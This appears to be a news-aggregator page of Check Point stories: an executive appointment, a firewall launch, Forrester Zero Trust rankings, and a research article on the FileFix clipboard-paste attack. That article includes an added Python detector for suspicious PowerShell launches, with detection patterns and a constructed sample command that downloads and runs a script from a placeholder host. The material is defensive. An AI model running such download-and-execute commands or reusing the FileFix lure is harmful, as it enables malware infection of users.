Latest news with #CheckPointSoftwareTechnologies


Techday NZ
4 days ago
- Business
- Techday NZ
Jonathan Zanger named CTO to advance AI at Check Point
Jonathan Zanger has been appointed as Chief Technology Officer at Check Point Software Technologies and will lead the company's global cyber security and artificial intelligence (AI) initiatives.

Zanger steps into the CTO role with over 15 years of experience focused on developing and scaling cyber security and AI-based platforms. Prior to assuming this position, he served as CTO at Trigo, a company specialising in advanced AI and computer vision systems for autonomous retail. His academic background includes advanced degrees in Electrical Engineering and Computer Science, as well as an MBA from the Massachusetts Institute of Technology (MIT).

In his new role, Zanger will be responsible for shaping the evolution of Check Point's AI strategy. One of his main tasks will be embedding automation and machine learning across the Check Point Infinity Platform to support the company's prevention-first approach to cyber security. The objective is to enable more effective protection against the evolving landscape of cyber threats affecting enterprises operating in increasingly digital and hybrid environments.

The company's recognition as a leader in the Forrester Wave: Zero Trust Platform, Q3 2025 report, highlighted its ongoing efforts in AI. The report specifically noted Check Point's "plan to deliver AI-driven capabilities to automate network security functions." Additionally, Miercom has validated Check Point as one of the top-performing AI-powered security platforms in the sector, reflecting its achievements in automation and intelligent security management.

"AI is fundamentally reshaping both how cyber threats emerge and how we defend against them," said Nadav Zafrir, CEO at Check Point Software Technologies. "Jonathan's deep technical expertise and leadership in cyber security and applied AI, will accelerate our mission to deliver prevention-first security for a hyperconnected world. His appointment reinforces our commitment to shaping the future of cyber defence through bold innovation."

With AI's growing role in both advancing and combating cyber attacks, Check Point's new leadership aims to implement machine learning and automation from network gateways to the cloud. The expansion of the company's AI capabilities will be guided by Zanger's technical and strategic expertise in the field.

"I'm thrilled to join Check Point at such a pivotal moment," said Jonathan Zanger, Chief Technology Officer at Check Point. "Cyber security must evolve faster than the threats it's designed to stop. By embedding AI across every layer of our architecture, from gateways to the cloud, we're not just keeping pace, we're setting the pace."

The appointment of Zanger comes as Check Point continues to expand its investment in AI and reinforce its talent pool in cyber defence. The company's approach involves a unified strategy that integrates various environments - on-premises, hybrid, and cloud - under one management framework, while focusing on automation and continuous monitoring.

Check Point's Infinity Platform and ecosystem aim to support enterprise and service provider clients as digital transformation accelerates. Through its prevention-first ethos and open garden ecosystem, Check Point seeks to address the demands of hybrid mesh network architecture, security efficacy, and operational scalability across diverse IT environments.

Zanger's focus will now be on aligning Check Point's future AI strategy with industry demands for intelligent and unified security solutions. His leadership is expected to further the company's objectives as it bolsters its approach to prevention-first cyber security through AI integration.


TECHx
17-07-2025
- TECHx
FileFix: A New Social Engineering Threat Emerges
Check Point Research identifies how the new social engineering technique, FileFix, is being actively tested by threat actors in the wild.

Attackers have long exploited human trust as a primary attack surface, and they're doing it again with a new technique called FileFix. FileFix is a recently uncovered social engineering attack that builds on the widely abused ClickFix tactic. Unlike ClickFix, which tricks users into running malicious commands via the Windows Run dialog, FileFix takes a subtler approach: it opens a legitimate Windows File Explorer window from a webpage and silently loads a disguised PowerShell command into the user's clipboard. When the victim pastes into the Explorer address bar, the malicious command executes. This attack relies not on software vulnerabilities but on exploiting routine user actions and trust.

Within just two weeks of FileFix's public disclosure, Check Point Research observed this technique being actively tested in the wild by a known threat actor. This group previously deployed ClickFix-based phishing campaigns targeting users of major cryptocurrency platforms. The FileFix tests so far use benign payloads, signaling an imminent shift to delivering real malware. During the same period, threat group KongTuke was also found using the method in a recent campaign.

With FileFix now operational in real-world campaigns, defenders must prepare for the next phase: full-scale deployment of malicious payloads using this technique. The attack infrastructure is established, and it's only a matter of time before FileFix causes significant damage.

'Threat actors began using FileFix less than two weeks after it was published, showing just how quickly cyber criminals adapt. Like ClickFix, this technique doesn't rely on complex exploits, but on manipulating routine user behavior. By shifting from the Run dialog to File Explorer, attackers are now hiding in plain sight, making detection harder and the threat more dangerous,' said Eli Smadja, Group Manager, Security Research at Check Point Software Technologies.

This blog will explain how the FileFix attack works, profile the threat actor testing it, and provide actionable guidance for defenders to detect, block, and prepare for this evolving threat.

Background: The Rise of FakeCaptcha/FixIt/ClickFix Attacks

ClickFix is a simple but highly effective social engineering trick. It convinces users to run malicious code by pretending there's a technical problem that needs fixing, like a broken CAPTCHA or browser error. Victims are typically told to copy and paste a command into the Windows Run dialog, unknowingly infecting themselves in the process.

Over the past year, ClickFix attacks have surged, evolving into one of the most common initial access methods. Attackers spoof familiar services and design convincing error messages to lower users' defenses. This success paved the way for FileFix, a new variation with even subtler execution.

The FileFix Technique: An Evolution of ClickFix Social Engineering Attacks

Building on the widespread success of the ClickFix social engineering attack, security researcher mr.d0x introduced FileFix on June 23, 2025, a new, stealthier technique designed to trick users into executing malicious commands without raising suspicion. Unlike ClickFix, which relies on the more noticeable Windows Run dialog, FileFix shifts the attack to the familiar and trusted environment of Windows File Explorer. This technique does not exploit software vulnerabilities; instead, it leverages user trust in everyday Windows actions to execute harmful code.

How FileFix works

A malicious webpage can launch a Windows Explorer window on the victim's computer. Simultaneously, JavaScript running on that webpage quietly copies a disguised PowerShell command to the user's clipboard. The victim is then instructed to paste a 'file path' into the Explorer address bar. Instead of a real file path, the pasted content is a hidden PowerShell command. When the user presses Enter, Windows Explorer executes the command, which downloads and runs malware, all without displaying any obvious warning or command prompt.

To victims, this process appears to be a simple task of opening a shared file or folder, making it feel routine and safe. This subtle manipulation makes FileFix a more stealthy and potentially more dangerous evolution of the ClickFix social engineering attack.

[Figure: The phishing site after being updated to deliver a malicious script]

Our Discovery: FileFix Technique Actively Tested in the Wild by Known Threat Actors

Just over two weeks after the FileFix social engineering technique was publicly disclosed, in early July 2025, Check Point Research observed cyber criminals actively testing this new attack method in real-world campaigns. The threat actor, previously known for leveraging the ClickFix technique to distribute malware such as loaders, remote access Trojans (RATs), and information stealers, has begun experimenting with FileFix as part of their phishing operations.

On July 6, 2025, we detected a newly registered domain hosting a phishing page closely resembling this group's earlier campaigns. Although the embedded FileFix script initially delivered only a benign payload, the activity clearly signals that threat actors are preparing to weaponize FileFix for future malware distribution and targeted attacks.

Threat Actor Profile & Past Activity

This threat actor has a history of targeting users of major cryptocurrency exchanges and other legitimate services. Their primary lure technique is SEO poisoning, which involves manipulating search engine results to promote malicious sites to the top. For example, a recent attack used a malicious sponsored Bing ad (malvertising) directing a victim to a fake 1Password site, where they were tricked into executing a ClickFix script that installed a NetSupport Manager remote access tool on their machine.

A signature trait of this actor's phishing pages is their consistent imitation of Cloudflare CAPTCHA or security verification screens. To broaden their reach, the actor translates their lures into multiple languages including English, Korean, Slovak, and Russian, making their campaigns global and adaptable.

[Figure: Phishing pages in different languages]

Threat actors started using the new FileFix technique less than two weeks after its publication, demonstrating how quickly cyber criminals adapt to emerging trends. Techniques like ClickFix have emerged as some of the most effective initial access methods, not through technical exploits but via low-cost, high-impact manipulation of user behavior.

Preparing for the Next Wave of Social Engineering Attacks: Defending Against FileFix and ClickFix

The rapid rise of the ClickFix technique in 2025 highlights that social engineering remains one of the most cost-effective and enduring methods cyber criminals use to breach defenses. This approach exploits human behavior by tricking users into unknowingly executing malicious commands on their own computers. FileFix advances this tactic by concealing harmful commands behind the seemingly harmless act of opening files in Windows File Explorer.

The fact that FileFix is already being tested and used in the wild mere days after its public disclosure shows how quickly attackers adopt new techniques and adapt to the evolving cyber threat landscape.

Key Recommendations for Defenders and Users

- Be highly suspicious of any webpage or email that asks you to perform unusual manual actions, especially copying and pasting commands into system dialogs or Windows Explorer address bars.
- Educate users that legitimate websites and software rarely require manual execution of commands to fix issues.
- Monitor phishing pages that mimic popular services or security verification screens, particularly those using Cloudflare-like templates or recurring fake identifiers like Ray IDs.
- Implement and fine-tune endpoint detection rules to flag suspicious clipboard activity or unusual PowerShell executions triggered by user actions.
- Stay current with emerging social engineering trends and regularly update user training, incident response plans, and security playbooks.
- Foster a culture of verification where users confirm unexpected or unusual requests with IT or security teams before acting.

Staying informed and vigilant is critical to preventing attackers from turning users into unwitting accomplices.

Leveraging Endpoint Protection with Check Point Harmony Endpoint

Tools like Check Point's Harmony Endpoint offer advanced endpoint detection and response capabilities designed to identify suspicious behaviors, such as unusual clipboard manipulation or stealthy PowerShell command executions initiated by user interactions. By combining proactive threat hunting, behavioral analytics, and real-time blocking, Harmony Endpoint empowers organizations to detect and stop evolving social engineering attacks like FileFix and ClickFix before they cause damage.

In today's fast-changing threat environment, deploying intelligent endpoint protection solutions is essential to strengthening your organization's last line of defense.
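The recommendation above to flag unusual PowerShell executions triggered by user actions can be prototyped over process-creation telemetry. The following is an added example, not code from Check Point or from the original article: it assumes JSON-lines events with Sysmon-style `Image`, `ParentImage` and `CommandLine` fields, and the parent list, indicator set and threshold are illustrative assumptions to tune against your own telemetry. All sample events are constructed.

```python
import json
import ntpath
import re

# Assumption: interactive parents a pasted address-bar command could inherit
# (File Explorer itself, or the browser that opened the file dialog).
UI_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits that are rare when a user opens a shell by hand.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_command": re.compile(r"\s-e(nc|ncodedcommand)?\s", re.I),
    "hidden_window": re.compile(r"\s-w(indowstyle)?\s+h(idden)?\b", re.I),
    "download_or_eval": re.compile(
        r"\b(invoke-webrequest|iwr|invoke-expression|iex|downloadstring)\b", re.I),
}

def score_event(event):
    """Return indicator names for a UI-parent -> interpreter launch, else None."""
    child = ntpath.basename(event.get("Image", "")).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if child not in INTERPRETERS or parent not in UI_PARENTS:
        return None  # lineage out of scope for this rule
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def triage(lines, threshold=2):
    """Alert on lineage matches with >= threshold indicators (0 = hunting view)."""
    alerts = []
    for raw in lines:
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # tolerate truncated or non-JSON lines
        if not isinstance(event, dict):
            continue
        hits = score_event(event)
        if hits is not None and len(hits) >= threshold:
            alerts.append({
                "parent": ntpath.basename(event["ParentImage"]).lower(),
                "child": ntpath.basename(event["Image"]).lower(),
                "hits": hits,
                "cmd": event.get("CommandLine", ""),
            })
    return alerts

PS = r"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample events (not real telemetry).
SAMPLE_LOG = [
    # User opens an interactive shell from Explorer: lineage match, no indicators.
    r'{"Image":"%s","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe"}' % PS,
    # Hidden download-and-run launched under a browser: three indicators.
    r'{"Image":"%s","ParentImage":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","CommandLine":"powershell.exe -w hidden -c iwr https://example.invalid/a.ps1 | iex"}' % PS,
    # Benign test payload, like the early tests the article describes: no indicators.
    r'{"Image":"%s","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell.exe -c ping example.com"}' % PS,
    # Service-launched script with a URL argument: parent is out of scope.
    r'{"Image":"%s","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"powershell.exe -File C:\\Scripts\\sync.ps1 -Uri https://example.invalid/api"}' % PS,
    "truncated line, not JSON",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert["parent"], "->", alert["child"], alert["hits"])
```

With the default threshold only the browser-parented event alerts; `triage(SAMPLE_LOG, threshold=0)` returns every in-scope launch, which is the view to use for hunting benign-payload tests that carry no command-line indicators.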


Techday NZ
17-07-2025
- Business
- Techday NZ
Check Point launches Quantum Spark 2500 firewalls for SMB security
Check Point Software Technologies has introduced the Quantum Spark 2500 series, a new firewall product family tailored for small and medium-sized businesses and managed service providers.

With the reported rise in cyberattacks targeting smaller organisations, Check Point Research notes that SMBs experienced a 61% year-over-year increase in cyberattacks, which exceeds the rate of increase observed in larger enterprises. This comes as cloud and SaaS bandwidth demands have also more than doubled over the past two years. With many SMBs lacking dedicated IT teams, there is growing reliance on managed service providers to deal with these increasingly complex security environments.

Security and connectivity

The Quantum Spark 2500 series is presented as an all-in-one solution offering several new features. These include built-in Wi-Fi 7, 5G connectivity, SD-WAN capabilities, and AI-driven threat prevention. These appliances are part of Check Point's Infinity architecture and are designed to support fast, secure, and resilient connectivity.

"The Quantum Spark 2500 series deliver a critical combination of security, speed, and simplicity. With AI-powered prevention, next-generation connectivity, and centralised cloud management, it empowers SMBs to scale securely without the burden of complex operations." This statement was made by Shahar Divon, Director of Worldwide MSSP and SMB Sales at Check Point Software Technologies.

Pete Finalle, Research Manager, IDC Security and Trust, commented on the difficulties faced by SMBs in the current threat environment. He noted, "Small and medium sized businesses are faced with an increasingly sophisticated threat-landscape, without the resources and dedicated personnel of larger enterprises. While managed service providers (MSPs) can help with deployment and management, they require security tools which solve modern security problems efficiently and effectively."

Finalle added, "Check Point's new Quantum Spark 2500 gateways and updated cloud-based security management offer high-performance threat prevention, accelerated connectivity with Wi-Fi 7, 5G, and SD-WAN, and protection for IoT devices. With multi-tier, multi-tenant management and zero-touch provisioning, Check Point is equipping MSPs with purpose-built tools that are ideal for protecting any size SMB from evolving threats."

Key features

The Quantum Spark 2500 series includes several core features:

- Wi-Fi 7 and 5G built in: Embedded Wi-Fi 7 and dual-SIM 5G support enable speeds up to 2.4 times faster than previous models and simplify remote access. SD-WAN functionality is included to deliver stable connectivity for organisations with cloud-first operations.
- AI-powered threat prevention: The appliances use ThreatCloud AI technology to achieve a claimed 99.9% malware prevention rate, including for ransomware, phishing, and zero-day exploits. Reported firewall throughput reaches up to 2.7 Gbps.
- Managed Application Protection (MAP): This feature identifies and controls shadow IT and high-risk software-as-a-service usage for better visibility, compliance, and data security.
- Built-in resilience: Dual power supplies, dual ISP ports, and optional clustering options increase availability and business continuity during outages.
- Zero-touch provisioning and cloud management: Integration with Check Point's Infinity Portal provides remote provisioning, real-time alerts, multi-tenant dashboards, and supports streamlined operations for service providers.

Integration and flexibility

The Quantum Spark 2500 series is part of the Check Point Infinity Platform. This supports hybrid mesh security across networks, cloud, and endpoints, aligning with the firm's open garden approach. The appliances are designed to be interoperable with third-party platforms, giving users more choice and avoiding vendor lock-in.

The Quantum Spark 2500 series appliances are now available for order through Check Point's official channels.


Channel Post MEA
16-07-2025
- Business
- Channel Post MEA
Check Point Named Leader In Zero Trust Platforms
Check Point Software Technologies has announced it has been recognized as a Leader in The Forrester Wave: Zero Trust Platforms, Q3 2025. The independent analyst report evaluated the 10 most significant Zero Trust platform providers and cited Check Point for delivering a unified, prevention-first security platform that covers network, cloud, and endpoint controls across hybrid environments.

Check Point received the highest possible scores (5 out of 5) in four critical criteria within the current offering category: centralized management and usability, least-privileged-access enforcement, segmentation and control, and deployment. The company also received 5/5 scores in the roadmap and supporting services and offerings criteria within the strategy category, which Check Point believes reinforces its strong vision and customer-centric approach.

'This recognition by Forrester affirms, for us, Check Point's leadership in delivering consistent Zero Trust security that is comprehensive, intuitive, and built for the AI-driven, hyperconnected world,' said Nataly Kremer, Chief Product Officer at Check Point Software. 'Our AI-powered Infinity Platform is purpose-built to help organizations secure users, assets, and data — wherever they reside — through centralized management, intelligent policy enforcement, and flexible deployment across cloud, on-prem, and hybrid environments.'

Check Point's highlights from the report include:

- Centralized Management
- Least-Privileged Access Enforcement
- Segmentation and control
- Deployment
- Roadmap
- Supporting services and offerings

Forrester also noted that organizations looking for a centralized, easy-to-manage, and holistic network security platform for local networks should include Check Point on their shortlist.

For Check Point, this position as a leader reinforces the company's commitment to a prevention-first strategy, helping enterprises proactively secure their infrastructure against modern threats while accelerating their Zero Trust adoption.


Techday NZ
14-07-2025
- Business
- Techday NZ
Check Point named a Leader in Forrester Wave Zero Trust report
Check Point Software Technologies has been named as a Leader in The Forrester Wave: Zero Trust Platforms, Q3 2025 report, following an assessment of ten prominent Zero Trust platform suppliers.

The independent analysis conducted by Forrester evaluated platforms for their ability to provide comprehensive security controls across network, cloud and endpoint environments within hybrid IT landscapes. Check Point's performance was highlighted specifically for its unified, prevention-first approach to security management.

Evaluation results

Check Point received the highest feasible scores, 5 out of 5, across several key criteria in the current offering category, including centralised management and usability, least-privileged-access enforcement, segmentation and control, as well as deployment. The company also achieved perfect marks in the roadmap and supporting services and offerings criteria within the strategy category.

The platform, referred to as the Infinity Platform, is designed to deliver centralised management, intelligent policy enforcement, and flexible deployment options across cloud, on-premises, and hybrid environments, supporting organisations in securing users, assets, and data wherever they are located.

"This recognition by Forrester affirms, for us, Check Point's leadership in delivering consistent Zero Trust security that is comprehensive, intuitive, and built for the AI-driven, hyperconnected world," said Nataly Kremer, Chief Product Officer at Check Point Software. "Our AI-powered Infinity Platform is purpose-built to help organisations secure users, assets, and data - wherever they reside - through centralised management, intelligent policy enforcement, and flexible deployment across cloud, on-prem, and hybrid environments."

Highlighted strengths

Key strengths for Check Point, as cited in the Forrester report, include its capabilities in centralised management, least-privileged access enforcement, network segmentation, and streamlined deployment processes. In the opinion of the analysts, the company's product roadmap and range of supporting services further reinforce Check Point's vision and customer-orientated approach to security.

The report also stated that organisations seeking a centralised, easy-to-manage, and holistic network security platform for local networks should consider including Check Point among their shortlist.

Strategy and prevention-first focus

Check Point's approach to Zero Trust security is underpinned by a prevention-first strategy, which the company states assists enterprises in proactively protecting their infrastructure against evolving threats, as well as accelerating Zero Trust adoption. The platform is described as offering unified security controls for contemporary IT environments that encompass a range of deployment options and management requirements.

The Forrester Wave: Zero Trust Platforms, Q3 2025, is produced as part of an independent comparative research process that assesses vendors by a defined set of criteria. Forrester's disclaimer notes that it does not endorse any company, product, or service included within its research, nor does it advise any party to select solutions exclusively based on the research findings or ratings. All information in the report is based on the best available resources at the time and reflects the analysts' judgement, which may be subject to change.